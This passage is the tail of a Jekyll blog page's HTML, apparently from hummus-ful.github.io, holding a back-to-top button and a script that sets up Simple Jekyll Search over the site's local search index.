aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://hummus-ful.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
